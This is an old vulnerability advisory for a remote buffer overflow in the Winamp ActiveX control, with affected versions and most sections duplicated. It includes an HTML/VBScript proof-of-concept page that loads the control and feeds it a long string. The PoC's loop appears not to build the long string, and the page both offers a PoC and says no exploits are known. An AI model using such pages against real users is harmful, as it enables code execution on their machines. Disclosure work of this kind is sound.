Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
BID:11107
Info
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 11107 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2004 12:00AM |
| Updated: | Sep 03 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to <[email protected]>. |
| Vulnerable: |
NullSoft Winamp 5.0 5 NullSoft Winamp 5.0 4 NullSoft Winamp 5.0 3 NullSoft Winamp 5.0 2 NullSoft Winamp 5.0 1 NullSoft Winamp 3.1 NullSoft Winamp 3.0 NullSoft Winamp 2.91 NullSoft Winamp 2.81 NullSoft Winamp 2.80 NullSoft Winamp 2.79 NullSoft Winamp 2.78 NullSoft Winamp 2.77 NullSoft Winamp 2.76 NullSoft Winamp 2.75 NullSoft Winamp 2.74 NullSoft Winamp 2.73 (full) NullSoft Winamp 2.73 NullSoft Winamp 2.72 NullSoft Winamp 2.71 NullSoft Winamp 2.70 (full) NullSoft Winamp 2.70 NullSoft Winamp 2.65 NullSoft Winamp 2.64 (standard) NullSoft Winamp 2.62 (standard) NullSoft Winamp 2.61 (full) NullSoft Winamp 2.60 (lite) NullSoft Winamp 2.60 (full) NullSoft Winamp 2.50 NullSoft Winamp 2.24 NullSoft Winamp 2.10 NullSoft Winamp 2.6 4 NullSoft Winamp 2.5 E NullSoft Winamp 2.5 e NullSoft Winamp 2.4 |
| Not Vulnerable: | |
Discussion
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.
Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.
Exploit / POC
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
The following proof of concept is available:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>
dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat
</SCRIPT>
</BODY></HTML>
If you're bored could also try -
CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
The following proof of concept is available:
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>
dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat
</SCRIPT>
</BODY></HTML>
If you're bored could also try -
CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution / Fix
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability
References:
References:
- Winamp Home Page (NullSoft)